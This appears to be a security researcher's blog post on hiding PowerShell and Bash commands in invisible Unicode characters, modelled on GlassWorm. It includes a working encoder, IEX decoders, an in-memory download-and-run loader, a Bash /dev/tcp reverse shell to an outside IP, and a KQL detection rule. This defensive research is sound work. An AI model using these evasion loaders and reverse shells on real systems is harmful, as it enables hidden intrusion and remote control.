Invisible Unicode Obfuscation: Beyond GlassWorm

Introduction

While analyzing several malware samples, I recently observed the use of mock directories (folders crafted to closely resemble default Windows directories but containing embedded spaces) to mislead analysts. A documented example of this technique can be found here: https://security.googlecloudcommunity.com/community-blog-42/finding-malware-dirtybulk-and-friends-usb-infections-to-fuel-cybercriminal-coinmining-operations-5552

“0.png”

Mock directories abusing embedded spaces to visually mimic legitimate Windows folders

Shortly after, John Hammond released a video on GlassWorm (https://www.youtube.com/watch?v=0XumkGQFEEk), malware that infects VS Code extensions by embedding obfuscated payloads made of invisible Unicode characters directly into the source code. These characters are visually similar to whitespace, making the malicious logic extremely hard to notice.

“1.png”

GlassWorm payload hidden inside a source code file using invisible Unicode characters. Source: https://www.koi.ai/blog/glassworm-first-self-propagating-worm-using-invisible-code-hits-openvsx-marketplace

This heavy reliance on whitespace-like characters sparked my curiosity. I wanted to understand how this technique works in practice, how it can be detected, and whether it could be applied in contexts beyond source code files. In many XDR products I use daily, file content inspection is limited or unavailable, which makes detecting this class of payload particularly challenging.

This led me to a broader question: can invisible Unicode obfuscation be abused in other execution contexts, such as command lines (PowerShell, Linux shells, etc.), to achieve Defense Evasion via Obfuscation (MITRE ATT&CK T1027.010 – Obfuscated Files or Information: Command Obfuscation)?

Since I found very little public material on this topic, I decided to conduct my own research.

The analysis was conducted through the following steps:

Research

The first step was collecting information on Unicode characters that are rendered as invisible or near-invisible. I quickly realized that the set is far larger than the one documented in the GlassWorm analysis.
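As a rough starting point for this kind of collection, the sketch below lists Basic Multilingual Plane code points whose Unicode general category suggests that no glyph is drawn. The category set and the function name `candidate_invisible_chars` are assumptions made for illustration, not the method used in this research. The heuristic is incomplete: characters such as U+3164 (HANGUL FILLER) or U+2800 (BRAILLE PATTERN BLANK) render as blank but belong to letter or symbol categories, so they still have to be added by hand.

```python
import unicodedata

# Assumption: these general categories are only a first-pass heuristic.
# Cf = format controls, Zs = space separators, Zl/Zp = line/paragraph separators.
CANDIDATE_CATEGORIES = {"Cf", "Zs", "Zl", "Zp"}


def candidate_invisible_chars(start=0x0000, end=0xFFFF):
    """Return code points in [start, end] whose category suggests no visible glyph."""
    return [
        cp
        for cp in range(start, end + 1)
        if unicodedata.category(chr(cp)) in CANDIDATE_CATEGORIES
    ]


if __name__ == "__main__":
    for cp in candidate_invisible_chars():
        ch = chr(cp)
        name = unicodedata.name(ch, "<unnamed>")
        print(f"U+{cp:04X}  {unicodedata.category(ch)}  {name}")
```

Whether a candidate is actually invisible still depends on the font and on the tool rendering it, which is why testing against real telemetry remains necessary.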

To understand their behavior in real telemetry, I printed these characters using a simple PowerShell script on a host monitored by Windows Defender. I then inspected how they appeared in Defender logs. Below are screenshots of the script and the resulting events. It is immediately evident that:

“2.png”

PowerShell script printing invisible and near-invisible Unicode characters for telemetry analysis

“3.png”

Windows Defender logs showing mixed rendering of invisible Unicode characters

Using Defender logs, I extracted all characters that appeared fully invisible and used them to build a proof of concept capable of obfuscating a payload.

Encoding logic

The encoder follows this logic:

The malicious code responsible for deobfuscation performs the inverse operation. Once the payload is reconstructed, it is executed using a cmdlet such as Invoke-Expression (IEX).
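Based on the PowerShell POC shown later in this post, the scheme can be sketched in Python as follows: each character becomes its 8-bit binary form, and each bit is replaced by one of two invisible characters. The function names `encode` and `decode` are illustrative. This sketch only reconstructs the string and deliberately does not execute it.

```python
ZERO = "\uFEFF"  # stands for bit 0, as in the PowerShell encoder
ONE = "\u0020"   # stands for bit 1


def encode(payload: str) -> str:
    """Map every character to 8 invisible characters, one per bit."""
    out = []
    for ch in payload:
        code = ord(ch)
        if code > 0xFF:
            # The 8-bit padding used by the POC cannot represent larger code points.
            raise ValueError("only code points up to U+00FF fit in 8 bits")
        bits = format(code, "08b")
        out.append("".join(ONE if b == "1" else ZERO for b in bits))
    return "".join(out)


def decode(encoded: str) -> str:
    """Inverse operation: rebuild the bit string, then read it 8 bits at a time."""
    bits = "".join("1" if ch == ONE else "0" for ch in encoded)
    usable = len(bits) - len(bits) % 8  # ignore a trailing partial byte
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


if __name__ == "__main__":
    hidden = encode("Write-Host test")
    print(len(hidden))     # 8 invisible characters per input character
    print(decode(hidden))
```

The eightfold size increase is what produces the very long, apparently empty command lines discussed below.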

Below is the encoder using the characters \uFEFF and \u0020:

“4.png”

Unicode encoder transforming a clear-text payload into invisible characters

And here is the POC that decodes and executes the payload:

“5.png”

PowerShell decoder reconstructing and executing the invisible Unicode payload

The result was interesting: no alert was triggered, and the Defender event appeared empty. The only visual clue was an unusually small horizontal scrollbar in the browser, indicating a very long command line. Scrolling far to the right reveals the PowerShell decoder logic, which seems to operate on an empty variable.

In reality, although the characters are invisible, they are composed of different bytes. This makes it possible to store information covertly. Additionally, if the analyst’s text editor does not fully support the Unicode characters used, copy-paste operations may corrupt the payload by replacing or normalizing characters, making analysis impossible. In such cases, the safest approach is to download the raw log and inspect it using a hex editor or a Unicode-aware text editor.
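When a hex editor is not at hand, a few lines of Python can make such a string readable. The sketch below is an illustrative helper (the names `reveal` and `codepoint_histogram` are hypothetical) that keeps printable ASCII as is and replaces everything else with a visible `<U+XXXX>` marker. It assumes the command line was obtained from the raw log without any normalization.

```python
from collections import Counter


def reveal(text: str) -> str:
    """Keep printable ASCII, show every other character as <U+XXXX>."""
    return "".join(
        ch if 0x20 <= ord(ch) <= 0x7E else f"<U+{ord(ch):04X}>"
        for ch in text
    )


def codepoint_histogram(text: str) -> Counter:
    """Count how often each code point occurs, keyed by its U+XXXX label."""
    return Counter(f"U+{ord(ch):04X}" for ch in text)


if __name__ == "__main__":
    sample = "$e='\ufeff \ufeff\ufeff '"
    print(reveal(sample))
    print(codepoint_histogram(sample).most_common(3))
```

A histogram dominated by two whitespace-like code points in roughly comparable proportions is a strong hint that bits are being encoded.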

“6.png”

Defender event appearing empty despite containing a long invisible command line

An alternative variant appears to consist of invoking powershell.exe from within an existing PowerShell session and passing the payload via -Args using a ScriptBlock. In this scenario, the PowerShell host may repackage the invocation for the spawned process using -EncodedCommand and -EncodedArguments, with the arguments being serialized internally as XML before Base64 encoding. This approach can be particularly effective when an attacker has interactive access to the host, such as via RDP or direct console access.

“7.png”

Decoder variant using a ScriptBlock in an existing PowerShell session so that the command is automatically Base64-encoded

“8.png”

Automatically generated -EncodedCommand and -EncodedArguments after process spawning

Even in this scenario, attempts to parse the command line reveal valid but apparently empty XML, potentially misleading analysts into assuming the event is benign or irrelevant.

“9.png”

Seemingly empty but valid XML generated from serialized invisible Unicode arguments
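To check whether such a value is really empty, it can be decoded outside the console. The sketch below relies on the fact that -EncodedCommand carries Base64 over UTF-16LE text, and it assumes that -EncodedArguments wraps the serialized XML in the same way, which should be verified on the PowerShell version in use. The function names are hypothetical.

```python
import base64


def decode_powershell_base64(value: str) -> str:
    """Decode a Base64 value as UTF-16LE text (the -EncodedCommand format)."""
    return base64.b64decode(value).decode("utf-16-le")


def escape_invisible(text: str) -> str:
    """Keep printable ASCII, show every other character as <U+XXXX>."""
    return "".join(
        ch if 0x20 <= ord(ch) <= 0x7E else f"<U+{ord(ch):04X}>"
        for ch in text
    )


if __name__ == "__main__":
    # Build a small sample value locally instead of using a real log entry.
    sample = base64.b64encode("$e='\ufeff \ufeff'".encode("utf-16-le")).decode("ascii")
    print(escape_invisible(decode_powershell_base64(sample)))
```

Escaping the decoded text before printing avoids the same rendering problem that makes the XML look empty in the first place.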

POC

Below is the POC code.

ENCODER:

$PAYLOAD = "Write-host paddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpadding malicious_command" 
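# Two invisible code points stand in for the bits 0 and 1
$UNICODE1 = [char]0xFEFF   # bit 0
$UNICODE2 = [char]0x0020   # bit 1
$encoded = New-Object System.Text.StringBuilder
foreach ($ch in $PAYLOAD.ToCharArray()) {
	# 8-bit binary form of the character (assumes code points up to 0xFF)
	$bin = [Convert]::ToString([int][char]$ch, 2).PadLeft(8,'0')
	foreach ($b in $bin.ToCharArray()) {
		# Emit one invisible character per bit
		[void]$encoded.Append($(if ($b -eq '0') { $UNICODE1 } else { $UNICODE2 }))
	}
}
# Final string: 8 invisible characters per payload character
$encoded = $encoded.ToString()
$encoded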

DECODERS:

# Variant 1: the invisible string is embedded in the -Command text as the literal $e
powershell.exe -NoProfile -NoLogo -Command ('$e='''+($encoded -replace '''','''''')+''';$d=-join([regex]::Matches((-join($e.ToCharArray()|%{[int]([int]0x0020-eq[int]$_)})),''.{8}'')|%{[char][convert]::ToInt32($_.Value,2)});iex $d')
# Variant 2: the invisible string is passed to a ScriptBlock through -Args
powershell.exe -NoProfile -NoLogo -Command {param($e)$d=-join([regex]::Matches((-join($e.ToCharArray()|%{[int](0x0020-eq[int]$_)})),'.{8}')|%{[char][convert]::ToInt32($_.Value,2)});iex $d} -Args $encoded

Simulation

Windows

After completing the POC, I attempted to simulate a very simple real-world attack using a reverse shell.

As a first step, I wrote a minimal reverse shell in C# and compiled it using csc.exe. I then exposed the compiled binary through a local HTTP server running on my machine.

“11.png”

Minimal C# reverse shell compiled and locally hosted for the simulation

Next, I created an online JavaScript tool for encoding and decoding invisible Unicode payloads. The tool is available at this page on my website.

Using this tool, I encoded a simple PowerShell script that downloads the executable via Invoke-WebRequest (iwr), reads its content, and loads it directly into memory. This approach avoids spawning additional child processes, resulting in a stealthier process tree. The PowerShell command was then Base64-encoded and executed using PowerShell's -EncodedCommand (-enc) option from a BAT file acting as a launcher.

“12.png”

PowerShell downloader obfuscated via the online Invisible Unicode Obfuscator tool

The resulting process tree looks like this:

flowchart LR
	a["`CMD
(*BAT file*)`"]
	b["`PowerShell
(*encoded command*)`"]
	c["`PowerShell
(*invisible command*)`"]
	d["`Reverse Shell
(*in memory*)`"]
a-->b
b-->c
c-->d

As shown below, the reverse shell is successfully triggered. Once again, the last relevant command line contains the payload encoded with invisible Unicode characters. Since the reverse shell is loaded entirely in memory, no additional child process is spawned. From a command-line and process-tree perspective, nothing appears to happen after this event, making the activity particularly difficult to detect without deep inspection of the command line itself. You can check this with Sysinternals Process Explorer.

“13.png”

Reverse shell execution with no visible command-line activity after payload decoding

Linux

I performed a similar test on Linux to verify whether the same technique could be applied outside the Windows ecosystem.

In this case, I used a very simple reverse shell implemented exclusively with Bash built-in features, avoiding the execution of child processes that might expose the real command or output. The payload is shown below:

exec 5<>/dev/tcp/82.85.145.134/80;cat <&5 | while read line; do $line 2>&5 >&5; done

This reverse shell was encoded using the same tool described earlier, available on my website, and executed with the following command:

eval "$(echo -n '                                                 ' | perl -C -ne 'foreach(split//){print(ord($_)==0x0009?"1":"0")}' | perl -lpe '$_=pack("B*",$_)')"

As expected, no clear-text command line is displayed, and the reverse shell successfully establishes a connection:

“14.png”

Linux reverse shell executed using invisible Unicode characters in the command line

This behavior can be further confirmed using pspy, which shows no meaningful command-line activity despite the active reverse shell:

“15.png”

pspy showing no meaningful command lines
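For analysis purposes, the Perl pipeline used in the Linux test can be mirrored in Python: a tab (U+0009) counts as bit 1, any other character as bit 0, and the bit string is packed into bytes. This is a sketch for recovering a payload from a captured command line, and it does not evaluate the result. The helper `encode_tab_bits` is hypothetical, exists only to build a test input, and uses a plain space for bit 0 as an assumption.

```python
def decode_tab_bits(hidden: str, one: str = "\t") -> bytes:
    """Rebuild the bytes hidden in a run of whitespace-like characters."""
    bits = "".join("1" if ch == one else "0" for ch in hidden)
    # Like Perl's pack("B*"), pad a trailing partial byte with zero bits.
    bits += "0" * (-len(bits) % 8)
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def encode_tab_bits(data: bytes, one: str = "\t", zero: str = " ") -> str:
    """Hypothetical inverse helper, used here only to produce sample input."""
    return "".join(
        one if bit == "1" else zero
        for byte in data
        for bit in format(byte, "08b")
    )


if __name__ == "__main__":
    hidden = encode_tab_bits(b"id")
    print(repr(hidden))
    print(decode_tab_bits(hidden))
```

Feeding the quoted argument of the echo command from a raw log into `decode_tab_bits` should reveal the command that eval receives, provided the log preserved the original characters.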

Detection

The following detection rule identifies the use of the invisible Unicode characters found during this research. It matches runs of at least 512 such characters (corresponding to at least 64 characters in the original payload). Multiple false positives were observed, such as Bash scripts containing large numbers of spaces, newlines, or sequences like “tab, tab and multiple spaces”. To reduce these false positives, the query computes the share of the matched characters taken by the most frequent one and discards events where that share is 95% or more.

let chars = @"([\u0009\u000A\u000D\u001B\u0020\u00A0\u00AD\u034F\u061C\u115F\u1160\u1680\u180E\u2000-\u200F\u2028\u2029\u202A-\u202E\u202F\u205F\u2060-\u206F\u2800\u3000\u3164\uFE00-\uFE0F\uFEFF\uFFA0\x{1D173}-\x{1D17A}\x{E0001}\x{E0020}-\x{E007F}\x{E0100}-\x{E01EF}]{512,})";
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where isnotempty(ProcessCommandLine)
| where ProcessCommandLine matches regex chars
| mv-apply seq = extract_all(chars, ProcessCommandLine) on (  // For each event, extract all matches
	extend s = tostring(seq)
	| mv-expand cp = unicode_codepoints_from_string(s)  // Expand the sequence into individual Unicode code points (one row per char)
	| summarize c = count() by cp = toint(cp)  // Count how many times each code point appears in the sequence
	| summarize SameRatio = todouble(max(c)) / todouble(sum(c))  // Compute ratio: (max frequency of a single char) / (total length of the sequence)
)
)
// Keep only events where the sequence is not "almost all the same char"
// (here: character with max frequency < 95% of the sequence)
| where SameRatio < 0.95
| project-away SameRatio
| distinct TimeGenerated, AccountName, ProcessCommandLine

“10.png”

Detection rule successfully identifying invisible Unicode obfuscation in command lines
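The same idea can be prototyped offline against exported command lines. The Python sketch below reuses the character class from the query and applies the dominant-character filter to each matched run separately, which is a simplification of the query's per-event computation. The names `suspicious_runs` and `same_ratio`, and the default thresholds, are assumptions taken from the rule above.

```python
import re
from collections import Counter

# Character class copied from the KQL rule, written with Python regex escapes.
INVISIBLE_CLASS = (
    r"\u0009\u000A\u000D\u001B\u0020\u00A0\u00AD\u034F\u061C\u115F\u1160\u1680\u180E"
    r"\u2000-\u200F\u2028\u2029\u202A-\u202E\u202F\u205F\u2060-\u206F\u2800\u3000\u3164"
    r"\uFE00-\uFE0F\uFEFF\uFFA0\U0001D173-\U0001D17A\U000E0001\U000E0020-\U000E007F"
    r"\U000E0100-\U000E01EF"
)


def same_ratio(seq: str) -> float:
    """Share of the run taken by its most frequent character."""
    counts = Counter(seq)
    return max(counts.values()) / len(seq)


def suspicious_runs(command_line: str, min_run: int = 512,
                    max_same_ratio: float = 0.95) -> list:
    """Return runs of invisible characters that are long and not near-uniform."""
    pattern = re.compile(f"[{INVISIBLE_CLASS}]{{{min_run},}}")
    return [
        m.group(0)
        for m in pattern.finditer(command_line)
        if same_ratio(m.group(0)) < max_same_ratio
    ]


if __name__ == "__main__":
    padding_only = "script.sh" + " " * 600
    print(len(suspicious_runs(padding_only)))  # uniform padding is filtered out
```

Lowering `min_run` catches shorter payloads at the cost of more false positives, so the threshold is best tuned against the environment's own telemetry.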

Additional detection tips:

References